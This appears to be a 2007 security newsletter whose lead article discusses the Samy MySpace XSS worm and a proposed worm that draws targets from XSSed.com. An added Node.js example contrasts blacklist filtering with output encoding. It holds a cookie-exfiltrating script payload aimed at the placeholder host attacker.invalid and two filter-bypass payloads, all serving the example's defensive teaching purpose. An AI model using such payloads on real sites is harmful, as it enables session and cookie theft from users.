
Wednesday, June 06, 2007

Is Another Web-Based Super Worm on the Way?

PLEASE VISIT OUR SPONSORS, WHO BRING YOU SECURITY UPDATE FOR FREE:

VeriSign's Extended Validation SSL Certificates

http://list.windowsitpro.com/t?ctl=58F2D:4160B336D0B60CB101BC126490DC23EB

Top Ten Server Virtualization Considerations

http://list.windowsitpro.com/t?ctl=58F38:4160B336D0B60CB101BC126490DC23EB

Protect Info from Phishing and Pharming Exploits

http://list.windowsitpro.com/t?ctl=58F25:4160B336D0B60CB101BC126490DC23EB


=== CONTENTS ===================================================

IN FOCUS: Is Another Web-Based Super Worm on the Way?

NEWS AND FEATURES
- Google Buys GreenBorder, Gains Security Technology
- Mozilla Releases Firefox Updates, Retires Firefox 1.5.0.x
- Spam King Gets Slapped with 35 Criminal Charges
- Recent Security Vulnerabilities

GIVE AND TAKE
- Security Matters Blog: PHP 5.2.3 Coming Soon--RC1 Available Now;
Windows Media Player Plug-In for Firefox
- FAQ: Disable IE Enhanced Security in Windows Server 2008
- From the Forum: Multiple Web Servers Behind One IP address with a
Proxy Server?
- Share Your Security Tips
- Microsoft Learning Paths for Security: Reducing the Challenges and
Complexities of Identity and Access Management

PRODUCTS
- Web Filter Gets Reporting Engine
- Product Evaluations from the Real World

RESOURCES AND EVENTS

FEATURED WHITE PAPER

ANNOUNCEMENTS


=== SPONSOR: VeriSign ==========================================

VeriSign's Extended Validation SSL Certificates
Increase customer confidence at transaction time with the latest
breakthrough in online security--Extended Validation (EV) SSL
Certificates from VeriSign. Extended Validation triggers the address
bar to turn green when a visitor is using Microsoft Internet Explorer 7
and viewing a site with EV SSL Certificates. This green bar lets
customers know that the site they are on is highly authenticated and
secure.
In a recent VeriSign study, 77% of the respondents indicated that
they would be hesitant about shopping at, would check into problems
with, or would abandon a site that once showed EV and no longer did.
Learn more about Extended Validation by reading the technical white
paper: Maximizing Site Visitor Trust Using Extended Validation SSL.

http://list.windowsitpro.com/t?ctl=58F2D:4160B336D0B60CB101BC126490DC23EB


=== IN FOCUS: Is Another Web-Based Super Worm on the Way? ======
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

Over the years, we've seen a number of "super worms." Nimda, Code Red,
and SQL Slammer, for example, were devastatingly effective: they spread
quickly, infected a huge number of systems, and cost a great deal to
eradicate.

Worm technology has certainly evolved, and in many cases it simply
follows the path of least resistance. Because Web technology is
dominant and Ajax (Asynchronous JavaScript and XML) is more widely used
every day, it's only natural that worms have begun to target those
technologies.

In fact, back in 2005, someone created an Ajax-based worm (dubbed Samy)
and turned it loose on MySpace. The worm exploited a stored cross-site
scripting flaw in MySpace profile pages: when a user viewed an infected
profile, the browser ran the JavaScript worm code embedded in that
page, in MySpace's own context and with the viewer's logged-in session.
The code then used Ajax requests to copy itself into the viewer's
profile, and the cycle repeated with each new visitor. Within 24 hours,
Samy had reportedly spread to more than 1 million MySpace pages! You
can read a blow-by-blow description of how the worm worked at this URL:

http://list.windowsitpro.com/t?ctl=58F3A:4160B336D0B60CB101BC126490DC23EB

Samy took advantage of several weaknesses, one of which is the familiar
cross-site scripting (XSS) scenario, in which attacker-supplied script
runs in the context of a site that never meant to serve it and so
inherits whatever the logged-in user is allowed to do there. If someone
were to take a worm like Samy further by giving it a list of many sites
vulnerable to XSS attacks, the effect could be far more significant.
After all, if the Samy worm could infect more than 1 million MySpace
pages in only 24 hours, a worm that hops among many different sites,
turning each site's users into carriers for the next, would spread far
faster. Furthermore, such a worm could do a lot more than simply spread
itself. It could, for example, easily be made to steal user credentials
or session cookies and post that information someplace for an intruder
to retrieve.

Recently, Petko Petkov showed how using a combination of available
technologies would provide the means for a new super worm to be
created. You might know about XSSed.com, a site that aggregates lists
of other sites that contain XSS vulnerabilities. The lists are
presented in an easy-to-parse format and include examples of how to
exploit each XSS vulnerability. Having such a database available online
is useful, even educational, but at the same time, it's a treasure
trove for a malicious coder.

Petkov showed that a new super worm could use XSSed.com as a base and
technologies such as Dapper and Yahoo Pipes to spread itself at
lightning speed. Dapper (at the first URL below) lets people grab
content from nearly any Web site and have it automatically formatted
as XML (or other formats). So, effectively, someone can use Dapper to
turn the XSSed.com listings into a machine-readable list of vulnerable
sites along with each site's associated exploit, in a form that a
script can consume directly. Yahoo Pipes (at the second URL below) can
then combine and filter that output and serve it as a feed that a
malicious script fetches on the fly, so the worm never has to carry its
own target list.

http://list.windowsitpro.com/t?ctl=58F3F:4160B336D0B60CB101BC126490DC23EB

http://list.windowsitpro.com/t?ctl=58F3E:4160B336D0B60CB101BC126490DC23EB

With that data and those services available, a worm could spread
incredibly quickly. The problem is compounded by the fact that neither
Dapper nor Yahoo Pipes is specifically necessary for such a worm to
work: the scraping and feed-building they provide could easily be
recreated on any number of sites around the Internet, so blocking those
two services won't stop such a worm. The best defense, of course, is
not to create Web sites that contain XSS vulnerabilities in the first
place: treat everything users submit as untrusted and encode it for the
context in which it's output (HTML body, attribute, URL, or script),
rather than relying on a blacklist of "bad" strings, which is easy to
slip past. Marking session cookies HttpOnly also limits what injected
script can steal, although it doesn't stop that script from acting on
the user's behalf the way Samy did.
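The following is an added example and is not code from this newsletter,
from MySpace, or from Samy's write-up. It models, in Node.js, the
pattern described above: stored profile text rendered into a page after
a blacklist filter, with constructed payloads showing how such a filter
is slipped past, next to the hardened version that encodes the text for
HTML output. The function names, the payloads, and the host
attacker.invalid are assumptions made for the illustration.

```javascript
// Added example (not the newsletter's, MySpace's or Samy's code): a
// simplified model of how a Samy-style stored XSS reaches a profile page,
// why a blacklist filter fails to stop it, and how output encoding does.
// Runs under Node.js with no dependencies. All payloads are constructed.

// A naive blacklist of the kind Samy's write-up describes bypassing. It
// strips a few dangerous tokens once and lets everything else through.
function blacklistFilter(input) {
  return String(input)
    .replace(/<script[\s\S]*?<\/script>/gi, '') // whole <script> blocks
    .replace(/javascript:/gi, '')               // javascript: URLs
    .replace(/\son\w+\s*=/gi, ' ');             // on* handler attributes
}

// Context-aware encoding for text placed in the HTML body: every character
// that could open a tag or close an attribute becomes a character
// reference, so the browser treats the stored text as text, never markup.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function encodeForHtml(input) {
  return String(input).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// Render the stored "about me" text into the profile page. The vulnerable
// path is the Samy pattern: user-controlled HTML lands in the page after a
// blacklist pass. The hardened path encodes it instead.
function renderAboutMe(storedText, hardened) {
  const body = hardened ? encodeForHtml(storedText)
                        : blacklistFilter(storedText);
  return `<div id="about">${body}</div>`;
}

// Report whether the rendered fragment still carries script-capable markup:
// a start tag with an on* handler attribute or a javascript: URL. Numeric
// character references inside the tag are decoded first, because the
// browser decodes them before it parses the URL scheme.
function containsActiveContent(fragment) {
  const inner = fragment.replace(/^<div id="about">|<\/div>$/g, '');
  const tags = inner.match(/<[a-z][^>]*>/gi) || [];
  return tags.some((tag) => {
    const decoded = tag.replace(/&#(\d+);/g,
      (_, n) => String.fromCharCode(Number(n)));
    return /\son[a-z]+\s*=/i.test(tag) || /java\s*script:/i.test(decoded);
  });
}

// Constructed payloads (illustrative; not Samy's actual code). The host
// attacker.invalid is a placeholder in a reserved, non-resolving TLD.
const PAYLOADS = {
  // Caught by the blacklist: a plain <script> block that exfiltrates cookies.
  plainScript:
    '<script>new Image().src="http://attacker.invalid/?"+document.cookie</script>',
  // Slips past: the filter removes "javascript:" once, and deleting the
  // inner copy leaves a fresh "javascript:" behind.
  doubledScheme:
    '<a href="javajavascript:script:alert(document.cookie)">click</a>',
  // Slips past: a character reference breaks the literal the filter looks
  // for, but the browser decodes it before using the URL.
  entitySplit:
    '<a href="java&#10;script:alert(document.cookie)">click</a>',
};

// Run every payload through both render paths. Returns
// { name: { vulnerable: bool, hardened: bool } }, true = still active.
function evaluate(payloads = PAYLOADS) {
  const results = {};
  for (const [name, text] of Object.entries(payloads)) {
    results[name] = {
      vulnerable: containsActiveContent(renderAboutMe(text, false)),
      hardened: containsActiveContent(renderAboutMe(text, true)),
    };
  }
  return results;
}

console.table(evaluate());
```

Run it with node; the table shows the blacklist path still carrying
active content for two of the three payloads and the encoded path
carrying none. Note that encoding is context-specific: the same text
placed inside a JavaScript string or a URL needs that context's
encoding, not this HTML-body one.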

You can read more about Petkov's ideas at the first URL below. The
upcoming Black Hat USA 2007 conference will have at least three
presentations that deal with Web worms (see the second URL below),
including "Attacking Web Service Security: Message Oriented Madness,
XML Worms and Web Service Security Sanity" by Brad Hill; "Premature
Ajax-ulation" by Bryan Sullivan and Billy Hoffman; and "The Little
Hybrid Web Worm that Could" by Billy Hoffman and John Terrill. So if
you're going to Black Hat USA this year (July 28 - August 2 in Las
Vegas), consider attending these presentations.

http://list.windowsitpro.com/t?ctl=58F33:4160B336D0B60CB101BC126490DC23EB

http://list.windowsitpro.com/t?ctl=58F2C:4160B336D0B60CB101BC126490DC23EB


=== SPONSOR: SWSoft ============================================

Top Ten Server Virtualization Considerations
The playing field for server virtualization has become much more
crowded over the last few years. This checklist provides a list of the
main considerations and basic differences between the technologies to
provide a starting point for technology evaluation.

http://list.windowsitpro.com/t?ctl=58F38:4160B336D0B60CB101BC126490DC23EB


=== SECURITY NEWS AND FEATURES =================================

Google Buys GreenBorder, Gains Security Technology
Expanding its security tools further, Google has acquired
GreenBorder Technologies, maker of security tools that protect
browsers, IM clients, and email clients.

http://list.windowsitpro.com/t?ctl=58F30:4160B336D0B60CB101BC126490DC23EB

Mozilla Releases Firefox Updates, Retires Firefox 1.5.0.x
The Mozilla Foundation released updates for Firefox that fix five
vulnerabilities present in both the 2.0.0.x and 1.5.0.x versions and
said that unless a serious problem is discovered in the 1.5.0.x series,
no further updates to it will be made available.

http://list.windowsitpro.com/t?ctl=58F2F:4160B336D0B60CB101BC126490DC23EB

Spam King Gets Slapped with 35 Criminal Charges
Robert Alan Soloway, infamous as a prolific spammer, has been
arrested in Seattle and charged with several federal offenses. The
indictment charges Soloway with 35 counts of mail fraud, wire fraud,
email-based fraud, identity theft, and money laundering.

http://list.windowsitpro.com/t?ctl=58F2E:4160B336D0B60CB101BC126490DC23EB

Recent Security Vulnerabilities
If you subscribe to this newsletter, you also receive Security
Alerts, which inform you about recently discovered security
vulnerabilities. You can also find information about these
discoveries at

http://list.windowsitpro.com/t?ctl=58F27:4160B336D0B60CB101BC126490DC23EB


=== SPONSOR: Websense ==========================================

Protect Info from Phishing and Pharming Exploits
Combat phishing and pharming with complete protection against
complex Internet threats by filtering at multiple points on the
gateway, network, and endpoints.

http://list.windowsitpro.com/t?ctl=58F25:4160B336D0B60CB101BC126490DC23EB


=== GIVE AND TAKE ==============================================

SECURITY MATTERS BLOG: PHP 5.2.3 Coming Soon--RC1 Available Now;
Windows Media Player Plug-In for Firefox
by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=58F37:4160B336D0B60CB101BC126490DC23EB

PHP 5.2.3 will probably be released in the next week or two unless
major problems are discovered in RC1. Get a link to test RC1 right now;
plus get a link for a Microsoft-developed Windows Media Player (WMP)
plug-in for Mozilla Firefox.

http://list.windowsitpro.com/t?ctl=58F26:4160B336D0B60CB101BC126490DC23EB

FAQ: Disable IE Enhanced Security in Windows Server 2008
by John Savill, http://list.windowsitpro.com/t?ctl=58F35:4160B336D0B60CB101BC126490DC23EB


Q: How do I turn off Internet Explorer Enhanced Security Configuration
in Windows Server 2008?

Find the answer at

http://list.windowsitpro.com/t?ctl=58F31:4160B336D0B60CB101BC126490DC23EB

FROM THE FORUM: Multiple Web Servers Behind One IP Address with a Proxy
Server?
A forum participant writes that he has a cable modem connection with
a domain name mapped to his dynamic IP address. He has multiple Web
servers on his network that he wants to make accessible to the
Internet. When he had only one Web server, he could use port forwarding
to make that site accessible, but now with several servers, he wonders
if he needs to use a proxy server to forward requests to the
appropriate site. He also wonders if an article is available that
details how to set up a Windows Server 2003 machine as a proxy server.

http://list.windowsitpro.com/t?ctl=58F21:4160B336D0B60CB101BC126490DC23EB

SHARE YOUR SECURITY TIPS AND GET $100
Share your security-related tips, comments, or problems and
solutions in Security Pro VIP's Reader to Reader column. Email your
contributions to r2r@securityprovip.com. If we print your submission,
you'll get $100. We edit submissions for style, grammar, and length.

MICROSOFT LEARNING PATHS FOR SECURITY: Reducing the Challenges and
Complexities of Identity and Access Management
Learn how to reduce and control the challenges and complexities of
enterprisewide identity and access management. Gain more control by
providing a single view of a user's identity across the enterprise
through the automation of common tasks. And learn how to use an
integrated approach with smart cards, certificate and password
management, and user provisioning.

http://list.windowsitpro.com/t?ctl=58F32:4160B336D0B60CB101BC126490DC23EB


=== PRODUCTS ===================================================
by Renee Munshi, products@windowsitpro.com

Web Filter Gets Reporting Engine
Barracuda Networks announced the immediate availability of new
reporting capabilities in Barracuda Web Filter firmware 3.2. The
updated firmware adds a set of reports based on criteria such as user
behavior, traffic patterns over time, bandwidth usage, domain requests,
Web site categories, and log history, and it supports PDF, HTML, text,
and CSV output formats. The 3.2 firmware release also lets existing
Barracuda Web Filter customers compile reports on historical Web
traffic. (Barracuda Web Filter can store approximately six months of
Web traffic history.) Barracuda Web Filter customers with current
Energize Updates subscriptions can upgrade to the new firmware release
at no additional charge. For more information, go to

http://list.windowsitpro.com/t?ctl=58F3D:4160B336D0B60CB101BC126490DC23EB

PRODUCT EVALUATIONS FROM THE REAL WORLD
Share your product experience with your peers. Have you discovered a
great product that saves you time and money? Do you use something you
wouldn't wish on anyone? Tell the world! If we publish your opinion,
we'll send you a Best Buy gift card! Send information about a product
you use and whether it helps or hinders you to
whatshot@windowsitpro.com.


=== RESOURCES AND EVENTS =======================================
For more security-related resources, visit

http://list.windowsitpro.com/t?ctl=58F34:4160B336D0B60CB101BC126490DC23EB

Learn how to achieve ROI with your log management system in a matter of
months without costly or daunting investments. Attend this Web seminar
and learn how to ensure that your organization gets the most out of its
log management investment, the key requirements and architectural
differences you need to consider, and the caveats and risks to watch
for when you spec out your requirements and design.

http://list.windowsitpro.com/t?ctl=58F22:4160B336D0B60CB101BC126490DC23EB

Tune in to the hottest network security products by listening to this
exclusive podcast featuring Windows IT Pro Editorial and Strategy
Director Karen Forster and Microsoft's Ian Hameroff. Learn how Network
Access Control (NAC) and Network Access Protection (NAP) work, the
technologies that are involved, and which third-party products are
poised to work with those technologies.

http://list.windowsitpro.com/t?ctl=58F24:4160B336D0B60CB101BC126490DC23EB

Don't miss the 16th USENIX Security Symposium in Boston, August 6-10,
2007. Security '07 offers in-depth training by experts such as Richard
Bejtlich (on TCP/IP Weapons School) and Dan Geer (on measuring
security). The comprehensive technical program includes a keynote
address by Steven Levy, senior editor and columnist at "Newsweek," on
"How the iPod Shuffled the World as We Know It"; 23 refereed papers;
and talks by Gary McGraw and Peter Gutmann. Don't miss the latest
advances in the security of computer systems and networks. Register by
July 16 and save!

http://list.windowsitpro.com/t?ctl=58F3B:4160B336D0B60CB101BC126490DC23EB


=== FEATURED WHITE PAPER =======================================

MSCS clustering can be a good option for local high availability, but
it doesn't completely protect you from unplanned downtime. Download
this free white paper and learn how extending your MSCS cluster offsite
with a high-availability solution that integrates with CDP technology
can protect against data corruption, including damage done by viruses
or human error.

http://list.windowsitpro.com/t?ctl=58F23:4160B336D0B60CB101BC126490DC23EB


=== ANNOUNCEMENTS ==============================================

Scripting Pro VIP--Just Download and Run
Scripting Pro VIP is an online resource that delivers in-depth
articles (with downloadable code!) every week on topics such as ADSI,
ADO, and much more. Subscribers also receive tips, cautionary advice,
direct access to our editors, and a host of other unique benefits!
Order now at an exclusive charter rate and save up to $50!

http://list.windowsitpro.com/t?ctl=58F29:4160B336D0B60CB101BC126490DC23EB

Special Invitation for VIP Access
Become a VIP subscriber and get continuous, inside access to ALL the
content published in Windows IT Pro, SQL Server Magazine, Exchange &
Outlook Pro VIP, Scripting Pro VIP, and Security Pro VIP. Subscribe
now!:

http://list.windowsitpro.com/t?ctl=58F28:4160B336D0B60CB101BC126490DC23EB


================================================================

Security UPDATE is brought to you by the Windows IT Pro Web site's
Security page (first URL below) and Security Pro VIP (second URL
below).

http://list.windowsitpro.com/t?ctl=58F36:4160B336D0B60CB101BC126490DC23EB

http://list.windowsitpro.com/t?ctl=58F3C:4160B336D0B60CB101BC126490DC23EB

Subscribe to Security UPDATE at

http://list.windowsitpro.com/t?ctl=58F2B:4160B336D0B60CB101BC126490DC23EB

Unsubscribe by clicking

http://list.windowsitpro.com/u?id=4160B336D0B60CB101BC126490DC23EB

Be sure to add Security_UPDATE@list.windowsitpro.com
to your antispam software's list of allowed senders.

To contact us:
About Security UPDATE content -- letters@windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=58F39:4160B336D0B60CB101BC126490DC23EB

About your product news -- products@windowsitpro.com
About your subscription -- windowsitproupdate@windowsitpro.com
About sponsoring Security UPDATE -- salesopps@windowsitpro.com

View the Windows IT Pro privacy policy at

http://list.windowsitpro.com/t?ctl=58F2A:4160B336D0B60CB101BC126490DC23EB

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department

Copyright 2007, Penton Media, Inc. All rights reserved.
